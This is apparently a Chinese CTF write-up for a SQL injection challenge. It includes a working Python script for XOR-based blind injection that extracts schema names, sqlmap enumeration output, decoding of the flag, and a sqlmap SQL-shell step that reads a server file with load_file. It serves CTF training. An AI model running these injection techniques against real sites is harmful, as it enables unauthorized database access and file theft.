这里进行模糊测试,发现过滤了一大堆符号,但发现id为1和0时login name不同
考虑异或的sql盲注
附上我的脚本
import requests
flag = ""
for i in range(1, 2000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
url="http://*********/SQL%20Injection/?id=1^(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))>{1})".format(i,mid)
res = requests.get(url=url)
if 'Taka' in res.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if (mid == 32 or mid == 127):
break
flag = flag + chr(mid)
print(flag)
跑出了表名
爆列名
id,name,Host,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,Event_priv,Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections,plugin,authentication_string,password_expired,password_last_changed,password_lifetime,account_locked,id,name,id,name,password
跑了许久,爆了一大堆列名,发现并没有我们想要的flag,尝试使用sqlmap来爆表
available databases [14]:
[*] information_schema
[*] lts
[*] mysql
[*] performance_schema
[*] qhr
[*] qzw
[*] sys
[*] syy
[*] tempdb
[*] Weikl
[*] wry
[*] wzx
[*] youki
[*] yoursql
爆出了14个库
Database: Weikl
[2 tables]
+----------------+
| user |
| flag |
+----------------+
Database: mysql
[18 tables]
+----------------+
| user |
| columns_priv |
| db |
| engine_cost |
| event |
| func |
| general_log |
| help_keyword |
| help_topic |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| server_cost |
| servers |
| slow_log |
| tables_priv |
| time_zone |
+----------------+
Database: sys
[12 tables]
+----------------+
| session |
| version |
| host_summary |
| latest_file_io |
| metrics |
| processlist |
| sys_config |
| user_summary |
| x$host_summary |
| x$processlist |
| x$session |
| x$user_summary |
+----------------+
Database: syy
[1 table]
+----------------+
| usersql |
+----------------+
Database: tempdb
[1 table]
+----------------+
| user |
+----------------+
Database: wry
[1 table]
+----------------+
| dataform |
+----------------+
Database: wzx
[1 table]
+----------------+
| id |
+----------------+
Database: youki
[1 table]
+----------------+
| user |
+----------------+
Database: yoursql
[1 table]
+----------------+
| flag |
+----------------+
发现这里的列名中有我们想要的flag
查查数据
Database: Weikl
Table: flag
[1 entry]
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| flag |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 0x253537253537253339253331253439253438253532253666253631253537253335253732253439253438253532253666253631253538253464253637253631253538253464253637253561253664253738253638253561253761253338253637253536253437253638253730253632253664253733253637253539253537253634253638253631253537253334253364 |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
八进制
尝试转化为字符串
我这里是在BP中解密的
url解密
BASE64解密
不是这个,尝试另外一个
Database: yoursql
Table: flag
[1 entry]
+--------------------------------------------------------------------------------------------------------------------+
| flag |
+--------------------------------------------------------------------------------------------------------------------+
| 0x466c616773206172652073746f726564206173207465787420756e646572207468652064617461626173652073746f726167652070617468 |
+--------------------------------------------------------------------------------------------------------------------+
一眼十六进制,尝试十六进制转换字符串
都不是
但这里给出了hint
我们推测flag以txt文本的形式存储在数据库的存储路径下,使用sqlmap的交互式shell
这里我们使用-sql-shell因为使用-os-shell爆不出来网站的绝对路径无法使用
>python3 sqlmap.py -u http://********/SQL%20Injection/?id=1 -sql-shell
select @@datadir
得到数据库存储路径
读文件
select load_file('/var/lib/mysql/flag.txt')
得到flag,再对里面进行base64解密